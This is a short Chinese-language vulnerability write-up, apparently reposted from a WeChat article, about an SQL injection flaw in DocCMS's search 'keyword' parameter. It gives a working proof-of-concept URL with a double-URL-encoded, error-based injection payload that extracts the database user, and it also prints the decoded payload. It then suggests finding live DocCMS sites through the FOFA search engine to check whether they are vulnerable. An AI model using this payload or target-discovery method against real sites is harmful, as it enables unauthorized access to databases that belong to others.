前言
DocCms[音译:稻壳Cms] ,定位于为企业、站长、开发者、网络公司、VI策划设计公司、SEO推广营销公司、网站初学者等用户 量身打造的一款全新企业建站、内容管理系统,服务于企业品牌信息化建设,也适应用个人、门户网站建设!
官方网站
漏洞描述
DocCMS keyword参数存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库信息
漏洞影响范围
DocCMS
漏洞复现
可以在DocCMS官网下载,本地部署验证漏洞
验证POC
/search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33其中payload为下列语句的二次Url编码' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
此漏洞属于SQL 报错注入漏洞,此漏洞原理及利用不在解释,自行百度搜索。参考利用链接:
https://blog.csdn.net/l2872253606/article/details/124423275
https://blog.csdn.net/weixin_46706771/article/details/112768348
漏洞挖掘
可以利用网络空间搜索引擎,搜索相关CMS,验证漏洞是否存在。例如fofa搜索:app=”DocCMS”
文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247490154&idx=2&sn=ae72d844339269b2ab43ea4e41553f9a&chksm=974fbd52a03834441af6e97fb0dcedcdf2851e73010e732d6106d4743d41a1434b11700dd6a0#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh